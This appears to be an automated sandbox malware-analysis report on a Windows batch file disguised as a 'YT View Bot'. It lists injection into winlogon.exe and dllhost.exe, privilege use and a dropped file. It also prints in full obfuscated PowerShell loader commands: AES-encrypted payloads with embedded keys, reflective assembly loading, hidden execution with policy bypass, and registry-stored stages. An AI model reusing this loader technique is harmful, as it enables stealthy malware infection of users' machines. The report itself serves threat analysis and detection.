211abb138fdb4df615ae9d97a39fd06c29d7140da2ea5192ab92b6ec94e0cd61

Analysis

max time kernel
12s
max time network
77s
platform
windows10-2004_x64
resource
win10v2004-20221111-en
resource tags

arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system
submitted
16-12-2022 02:37

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

YT View Bot.bat
Size

10.5MB
MD5

1b0551c9ae613b922e576b1e5579678c
SHA1

9238a4986ac66a7b5ba1f9743c602f41c203d8b2
SHA256

211abb138fdb4df615ae9d97a39fd06c29d7140da2ea5192ab92b6ec94e0cd61
SHA512

c730357b2f321c4c9c78bd6d7b6ab48dd4111785be0fcab658ad2b66d6499afe959006fd34b73a3ad99049e41a5d25ec1aafe4021d085ae574e2a927f1f69ff4
SSDEEP

49152:8UZoNdFyVleMmcjbM8S+T9exgshH8W48Os02iblQl2CLNTvNKM76qNAbB/Kx2ftu:Q

Score

10^/10

Malware Config

Signatures

Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs

Processes:

YT View Bot.bat.exe$sxr-powershell.exe

description pid process target process

PID 4100 created 624 4100 YT View Bot.bat.exe winlogon.exe
PID 1616 created 624 1616 $sxr-powershell.exe winlogon.exe
Executes dropped EXE 4 IoCs

Processes:

YT View Bot.bat.exe$sxr-powershell.exe$sxr-powershell.exe$sxr-powershell.exe

pid process

4100 YT View Bot.bat.exe
1616 $sxr-powershell.exe
3588 $sxr-powershell.exe
4368 $sxr-powershell.exe

description	pid	process	target process
PID 4100 created 624	4100	YT View Bot.bat.exe	winlogon.exe
PID 1616 created 624	1616	$sxr-powershell.exe	winlogon.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

YT View Bot.bat.exe$sxr-powershell.exe

description	pid	process	target process
PID 4100 set thread context of 2276	4100	YT View Bot.bat.exe	dllhost.exe
PID 1616 set thread context of 4020	1616	$sxr-powershell.exe	dllhost.exe

Drops file in Windows directory 2 IoCs

Processes:

YT View Bot.bat.exe

description	ioc	process
File created	C:\Windows\$sxr-powershell.exe	YT View Bot.bat.exe
File opened for modification	C:\Windows\$sxr-powershell.exe	YT View Bot.bat.exe

Suspicious behavior: EnumeratesProcesses 19 IoCs

Processes:

YT View Bot.bat.exedllhost.exe$sxr-powershell.exedllhost.exe$sxr-powershell.exe

pid	process
4100	YT View Bot.bat.exe
4100	YT View Bot.bat.exe
4100	YT View Bot.bat.exe
2276	dllhost.exe
2276	dllhost.exe
2276	dllhost.exe
2276	dllhost.exe
4100	YT View Bot.bat.exe
4100	YT View Bot.bat.exe
1616	$sxr-powershell.exe
1616	$sxr-powershell.exe
1616	$sxr-powershell.exe
4020	dllhost.exe
4020	dllhost.exe
4020	dllhost.exe
4020	dllhost.exe
1616	$sxr-powershell.exe
1616	$sxr-powershell.exe
3588	$sxr-powershell.exe

Suspicious use of AdjustPrivilegeToken 7 IoCs

Processes:

YT View Bot.bat.exedllhost.exe$sxr-powershell.exedllhost.exe$sxr-powershell.exe

description	pid	process
Token: SeDebugPrivilege	4100	YT View Bot.bat.exe
Token: SeDebugPrivilege	4100	YT View Bot.bat.exe
Token: SeDebugPrivilege	2276	dllhost.exe
Token: SeDebugPrivilege	1616	$sxr-powershell.exe
Token: SeDebugPrivilege	1616	$sxr-powershell.exe
Token: SeDebugPrivilege	4020	dllhost.exe
Token: SeDebugPrivilege	3588	$sxr-powershell.exe

Suspicious use of WriteProcessMemory 30 IoCs

Processes:

cmd.exeYT View Bot.bat.exe$sxr-powershell.exe

description	pid	process	target process
PID 3368 wrote to memory of 4100	3368	cmd.exe	YT View Bot.bat.exe
PID 3368 wrote to memory of 4100	3368	cmd.exe	YT View Bot.bat.exe
PID 4100 wrote to memory of 2276	4100	YT View Bot.bat.exe	dllhost.exe
PID 4100 wrote to memory of 2276	4100	YT View Bot.bat.exe	dllhost.exe
PID 4100 wrote to memory of 2276	4100	YT View Bot.bat.exe	dllhost.exe
PID 4100 wrote to memory of 2276	4100	YT View Bot.bat.exe	dllhost.exe
PID 4100 wrote to memory of 2276	4100	YT View Bot.bat.exe	dllhost.exe
PID 4100 wrote to memory of 2276	4100	YT View Bot.bat.exe	dllhost.exe
PID 4100 wrote to memory of 2276	4100	YT View Bot.bat.exe	dllhost.exe
PID 4100 wrote to memory of 2276	4100	YT View Bot.bat.exe	dllhost.exe
PID 4100 wrote to memory of 2276	4100	YT View Bot.bat.exe	dllhost.exe
PID 4100 wrote to memory of 2276	4100	YT View Bot.bat.exe	dllhost.exe
PID 4100 wrote to memory of 2276	4100	YT View Bot.bat.exe	dllhost.exe
PID 4100 wrote to memory of 2276	4100	YT View Bot.bat.exe	dllhost.exe
PID 4100 wrote to memory of 2276	4100	YT View Bot.bat.exe	dllhost.exe
PID 4100 wrote to memory of 2276	4100	YT View Bot.bat.exe	dllhost.exe
PID 4100 wrote to memory of 2276	4100	YT View Bot.bat.exe	dllhost.exe
PID 4100 wrote to memory of 1616	4100	YT View Bot.bat.exe	$sxr-powershell.exe
PID 4100 wrote to memory of 1616	4100	YT View Bot.bat.exe	$sxr-powershell.exe
PID 1616 wrote to memory of 4020	1616	$sxr-powershell.exe	dllhost.exe
PID 1616 wrote to memory of 4020	1616	$sxr-powershell.exe	dllhost.exe
PID 1616 wrote to memory of 4020	1616	$sxr-powershell.exe	dllhost.exe
PID 1616 wrote to memory of 4020	1616	$sxr-powershell.exe	dllhost.exe
PID 1616 wrote to memory of 4020	1616	$sxr-powershell.exe	dllhost.exe
PID 1616 wrote to memory of 4020	1616	$sxr-powershell.exe	dllhost.exe
PID 1616 wrote to memory of 4020	1616	$sxr-powershell.exe	dllhost.exe
PID 1616 wrote to memory of 3588	1616	$sxr-powershell.exe	$sxr-powershell.exe
PID 1616 wrote to memory of 3588	1616	$sxr-powershell.exe	$sxr-powershell.exe
PID 1616 wrote to memory of 4368	1616	$sxr-powershell.exe	$sxr-powershell.exe
PID 1616 wrote to memory of 4368	1616	$sxr-powershell.exe	$sxr-powershell.exe

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:624

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{ac4550fd-64fd-4b75-a7f2-d971eec9a28d}
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2276

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{9650b66c-a66e-4d01-82cb-9325f76c4143}
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4020

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{51852772-edbf-4612-9a09-346d8d63adea}
2⤵
PID:3764

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\YT View Bot.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:3368

C:\Users\Admin\AppData\Local\Temp\YT View Bot.bat.exe
"YT View Bot.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $MvlIS = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\YT View Bot.bat').Split([Environment]::NewLine);foreach ($MzCNk in $MvlIS) { if ($MzCNk.StartsWith(':: ')) { $itSKE = $MzCNk.Substring(3); break; }; };$tMFEI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($itSKE);$IGsIO = New-Object System.Security.Cryptography.AesManaged;$IGsIO.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IGsIO.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IGsIO.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Vcuu8ShCrP9h1rrR5ErahhL7TUEeQx/KPesC3FwudOc=');$IGsIO.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mD4DmWDZsU38dqYmEkxMDA==');$mgOLK = $IGsIO.CreateDecryptor();$tMFEI = $mgOLK.TransformFinalBlock($tMFEI, 0, $tMFEI.Length);$mgOLK.Dispose();$IGsIO.Dispose();$oBkpt = New-Object System.IO.MemoryStream(, $tMFEI);$BeQyt = New-Object System.IO.MemoryStream;$lAZiX = New-Object System.IO.Compression.GZipStream($oBkpt, [IO.Compression.CompressionMode]::Decompress);$lAZiX.CopyTo($BeQyt);$lAZiX.Dispose();$oBkpt.Dispose();$BeQyt.Dispose();$tMFEI = $BeQyt.ToArray();$eePxU = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($tMFEI);$SCfgm = $eePxU.EntryPoint;$SCfgm.Invoke($null, (, [string[]] ('')))
2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4100

C:\Windows\$sxr-powershell.exe
"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command $pipZR1 = New-Object System.Security.Cryptography.AesManaged;$pipZR1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$pipZR1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$pipZR1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('aNJzU0Wh7kY9rwzBT78oJ1wiloTq/+RRntIBAfDfENg=');$pipZR1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('S6Pq+md1iAIgVNcHsxgM8w==');$XdDki = $pipZR1.('rotpyrceDetaerC'[-1..-15] -join '')();$tagqY = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('5ustVY8Pqgcg1xlNi8JTVg==');$tagqY = $XdDki.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tagqY, 0, $tagqY.Length);$tagqY = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tagqY);$xIjmq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wHPva9FzqB309fr6XnRPr7I62/D5SEcAeyEieU2SaJ4=');$xIjmq = $XdDki.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($xIjmq, 0, $xIjmq.Length);$xIjmq = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($xIjmq);$gPqLf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('5fR/Q0c/Mb9uImXigsnEjQ==');$gPqLf = $XdDki.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($gPqLf, 0, $gPqLf.Length);$gPqLf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($gPqLf);$dHUnA = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('G/j1UyVuWVLkONhVTV7UGAb0buavSZnXzC8N/ybdX47f37JNz11yQo78ioiSjDGt+SKNfpjKrgqerIig4u27+IM/r0RlqLI8KyhPDDG2JsaU/RPQVYfFKZLqfQkLpClUd7e8YrijBu2ZR5M/SGLaXuqIYAGyqNLG82LuwyD/BwSp3QxF4qL6tfdQhLYdB0s+kJy+dKlksNaRpdk8DVXK6DYqbqlF2JZ8s6XawhjUPUWK5RcH4qVETNvJkIP9KnuwAZezWhHR50GUN37srEpEC6R2YmckmoY/OvSxSrZ0xTpYk9hw5YE/oLjlh5SAr7r0JutSb2B/vxZy6ueGswMyvabHustF6ViBCgxPbcvdp/ChFw0J0+7ckb4TpJkA/LE575/mSgKPWnqwduG9OdpUgdnDUYxbbrE7NnJKhf4N9mE=');$dHUnA = $XdDki.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($dHUnA, 0, $dHUnA.Length);$dHUnA = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($dHUnA);$XIjgA = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('oaNzpE4XcEVHbcUwG0kf5A==');$XIjgA = $XdDki.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XIjgA, 0, $XIjgA.Length);$XIjgA = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XIjgA);$ZiATm = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vR2jKV8WZ/w6qkVXDGyXeA==');$ZiATm = $XdDki.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ZiATm, 0, $ZiATm.Length);$ZiATm = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ZiATm);$yTemZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6yGizSo/R7vdodR0NDP7mA==');$yTemZ = $XdDki.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($yTemZ, 0, $yTemZ.Length);$yTemZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($yTemZ);$IgEqc = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uzvi7i/DzE7DeWIJ2N1ZFA==');$IgEqc = $XdDki.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IgEqc, 0, $IgEqc.Length);$IgEqc = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IgEqc);$rruSG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sU+qCTuVJ33RG/fWqLIbkA==');$rruSG = $XdDki.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($rruSG, 0, $rruSG.Length);$rruSG = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($rruSG);$tagqY0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('CmzcSesKmuZCi9P/dkHwMQ==');$tagqY0 = $XdDki.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tagqY0, 0, $tagqY0.Length);$tagqY0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tagqY0);$tagqY1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('InjIvNLletDRj5mJPHa4yA==');$tagqY1 = $XdDki.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tagqY1, 0, $tagqY1.Length);$tagqY1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tagqY1);$tagqY2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('htBQz3KYDcinqLlq2xKUnA==');$tagqY2 = $XdDki.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tagqY2, 0, $tagqY2.Length);$tagqY2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tagqY2);$tagqY3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MHWBRZszc3VVpAvjONe/Wg==');$tagqY3 = $XdDki.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tagqY3, 0, $tagqY3.Length);$tagqY3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tagqY3);$XdDki.Dispose();$pipZR1.Dispose();$AJZmu = [Microsoft.Win32.Registry]::$IgEqc.$yTemZ($tagqY).$ZiATm($xIjmq);$DfRTn = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($AJZmu);$pipZR = New-Object System.Security.Cryptography.AesManaged;$pipZR.Mode = [System.Security.Cryptography.CipherMode]::CBC;$pipZR.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$pipZR.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('aNJzU0Wh7kY9rwzBT78oJ1wiloTq/+RRntIBAfDfENg=');$pipZR.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('S6Pq+md1iAIgVNcHsxgM8w==');$FnrzO = $pipZR.('rotpyrceDetaerC'[-1..-15] -join '')();$DfRTn = $FnrzO.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DfRTn, 0, $DfRTn.Length);$FnrzO.Dispose();$pipZR.Dispose();$GUtCq = New-Object System.IO.MemoryStream(, $DfRTn);$opLWn = New-Object System.IO.MemoryStream;$RfNsM = New-Object System.IO.Compression.GZipStream($GUtCq, [IO.Compression.CompressionMode]::$tagqY1);$RfNsM.$rruSG($opLWn);$RfNsM.Dispose();$GUtCq.Dispose();$opLWn.Dispose();$DfRTn = $opLWn.ToArray();$SHskK = $dHUnA | IEX;$jcubt = $SHskK::$tagqY2($DfRTn);$boBJt = $jcubt.EntryPoint;$boBJt.$tagqY0($null, (, [string[]] ($gPqLf)))
3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1616

C:\Windows\$sxr-powershell.exe
"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(1616).WaitForExit();[System.Threading.Thread]::Sleep(5000); $pipZR1 = New-Object System.Security.Cryptography.AesManaged;$pipZR1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$pipZR1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$pipZR1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('aNJzU0Wh7kY9rwzBT78oJ1wiloTq/+RRntIBAfDfENg=');$pipZR1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('S6Pq+md1iAIgVNcHsxgM8w==');$XdDki = $pipZR1.('rotpyrceDetaerC'[-1..-15] -join '')();$tagqY = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('5ustVY8Pqgcg1xlNi8JTVg==');$tagqY = $XdDki.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tagqY, 0, $tagqY.Length);$tagqY = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tagqY);$xIjmq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wHPva9FzqB309fr6XnRPr7I62/D5SEcAeyEieU2SaJ4=');$xIjmq = $XdDki.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($xIjmq, 0, $xIjmq.Length);$xIjmq = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($xIjmq);$gPqLf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('5fR/Q0c/Mb9uImXigsnEjQ==');$gPqLf = $XdDki.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($gPqLf, 0, $gPqLf.Length);$gPqLf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($gPqLf);$dHUnA = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('G/j1UyVuWVLkONhVTV7UGAb0buavSZnXzC8N/ybdX47f37JNz11yQo78ioiSjDGt+SKNfpjKrgqerIig4u27+IM/r0RlqLI8KyhPDDG2JsaU/RPQVYfFKZLqfQkLpClUd7e8YrijBu2ZR5M/SGLaXuqIYAGyqNLG82LuwyD/BwSp3QxF4qL6tfdQhLYdB0s+kJy+dKlksNaRpdk8DVXK6DYqbqlF2JZ8s6XawhjUPUWK5RcH4qVETNvJkIP9KnuwAZezWhHR50GUN37srEpEC6R2YmckmoY/OvSxSrZ0xTpYk9hw5YE/oLjlh5SAr7r0JutSb2B/vxZy6ueGswMyvabHustF6ViBCgxPbcvdp/ChFw0J0+7ckb4TpJkA/LE575/mSgKPWnqwduG9OdpUgdnDUYxbbrE7NnJKhf4N9mE=');$dHUnA = $XdDki.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($dHUnA, 0, $dHUnA.Length);$dHUnA = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($dHUnA);$XIjgA = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('oaNzpE4XcEVHbcUwG0kf5A==');$XIjgA = $XdDki.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XIjgA, 0, $XIjgA.Length);$XIjgA = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XIjgA);$ZiATm = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vR2jKV8WZ/w6qkVXDGyXeA==');$ZiATm = $XdDki.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ZiATm, 0, $ZiATm.Length);$ZiATm = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ZiATm);$yTemZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6yGizSo/R7vdodR0NDP7mA==');$yTemZ = $XdDki.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($yTemZ, 0, $yTemZ.Length);$yTemZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($yTemZ);$IgEqc = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uzvi7i/DzE7DeWIJ2N1ZFA==');$IgEqc = $XdDki.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IgEqc, 0, $IgEqc.Length);$IgEqc = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IgEqc);$rruSG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sU+qCTuVJ33RG/fWqLIbkA==');$rruSG = $XdDki.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($rruSG, 0, $rruSG.Length);$rruSG = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($rruSG);$tagqY0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('CmzcSesKmuZCi9P/dkHwMQ==');$tagqY0 = $XdDki.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tagqY0, 0, $tagqY0.Length);$tagqY0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tagqY0);$tagqY1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('InjIvNLletDRj5mJPHa4yA==');$tagqY1 = $XdDki.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tagqY1, 0, $tagqY1.Length);$tagqY1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tagqY1);$tagqY2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('htBQz3KYDcinqLlq2xKUnA==');$tagqY2 = $XdDki.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tagqY2, 0, $tagqY2.Length);$tagqY2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tagqY2);$tagqY3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MHWBRZszc3VVpAvjONe/Wg==');$tagqY3 = $XdDki.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tagqY3, 0, $tagqY3.Length);$tagqY3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tagqY3);$XdDki.Dispose();$pipZR1.Dispose();$AJZmu = [Microsoft.Win32.Registry]::$IgEqc.$yTemZ($tagqY).$ZiATm($xIjmq);$DfRTn = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($AJZmu);$pipZR = New-Object System.Security.Cryptography.AesManaged;$pipZR.Mode = [System.Security.Cryptography.CipherMode]::CBC;$pipZR.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$pipZR.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('aNJzU0Wh7kY9rwzBT78oJ1wiloTq/+RRntIBAfDfENg=');$pipZR.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('S6Pq+md1iAIgVNcHsxgM8w==');$FnrzO = $pipZR.('rotpyrceDetaerC'[-1..-15] -join '')();$DfRTn = $FnrzO.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DfRTn, 0, $DfRTn.Length);$FnrzO.Dispose();$pipZR.Dispose();$GUtCq = New-Object System.IO.MemoryStream(, $DfRTn);$opLWn = New-Object System.IO.MemoryStream;$RfNsM = New-Object System.IO.Compression.GZipStream($GUtCq, [IO.Compression.CompressionMode]::$tagqY1);$RfNsM.$rruSG($opLWn);$RfNsM.Dispose();$GUtCq.Dispose();$opLWn.Dispose();$DfRTn = $opLWn.ToArray();$SHskK = $dHUnA | IEX;$jcubt = $SHskK::$tagqY2($DfRTn);$boBJt = $jcubt.EntryPoint;$boBJt.$tagqY0($null, (, [string[]] ($gPqLf)))
4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3588

C:\Windows\$sxr-powershell.exe
"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(1616).WaitForExit();[System.Threading.Thread]::Sleep(5000); $pipZR1 = New-Object System.Security.Cryptography.AesManaged;$pipZR1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$pipZR1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$pipZR1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('aNJzU0Wh7kY9rwzBT78oJ1wiloTq/+RRntIBAfDfENg=');$pipZR1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('S6Pq+md1iAIgVNcHsxgM8w==');$XdDki = $pipZR1.('rotpyrceDetaerC'[-1..-15] -join '')();$tagqY = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('5ustVY8Pqgcg1xlNi8JTVg==');$tagqY = $XdDki.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tagqY, 0, $tagqY.Length);$tagqY = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tagqY);$xIjmq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wHPva9FzqB309fr6XnRPr7I62/D5SEcAeyEieU2SaJ4=');$xIjmq = $XdDki.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($xIjmq, 0, $xIjmq.Length);$xIjmq = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($xIjmq);$gPqLf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('5fR/Q0c/Mb9uImXigsnEjQ==');$gPqLf = $XdDki.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($gPqLf, 0, $gPqLf.Length);$gPqLf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($gPqLf);$dHUnA = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('G/j1UyVuWVLkONhVTV7UGAb0buavSZnXzC8N/ybdX47f37JNz11yQo78ioiSjDGt+SKNfpjKrgqerIig4u27+IM/r0RlqLI8KyhPDDG2JsaU/RPQVYfFKZLqfQkLpClUd7e8YrijBu2ZR5M/SGLaXuqIYAGyqNLG82LuwyD/BwSp3QxF4qL6tfdQhLYdB0s+kJy+dKlksNaRpdk8DVXK6DYqbqlF2JZ8s6XawhjUPUWK5RcH4qVETNvJkIP9KnuwAZezWhHR50GUN37srEpEC6R2YmckmoY/OvSxSrZ0xTpYk9hw5YE/oLjlh5SAr7r0JutSb2B/vxZy6ueGswMyvabHustF6ViBCgxPbcvdp/ChFw0J0+7ckb4TpJkA/LE575/mSgKPWnqwduG9OdpUgdnDUYxbbrE7NnJKhf4N9mE=');$dHUnA = $XdDki.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($dHUnA, 0, $dHUnA.Length);$dHUnA = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($dHUnA);$XIjgA = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('oaNzpE4XcEVHbcUwG0kf5A==');$XIjgA = $XdDki.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XIjgA, 0, $XIjgA.Length);$XIjgA = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XIjgA);$ZiATm = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vR2jKV8WZ/w6qkVXDGyXeA==');$ZiATm = $XdDki.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ZiATm, 0, $ZiATm.Length);$ZiATm = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ZiATm);$yTemZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6yGizSo/R7vdodR0NDP7mA==');$yTemZ = $XdDki.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($yTemZ, 0, $yTemZ.Length);$yTemZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($yTemZ);$IgEqc = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uzvi7i/DzE7DeWIJ2N1ZFA==');$IgEqc = $XdDki.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IgEqc, 0, 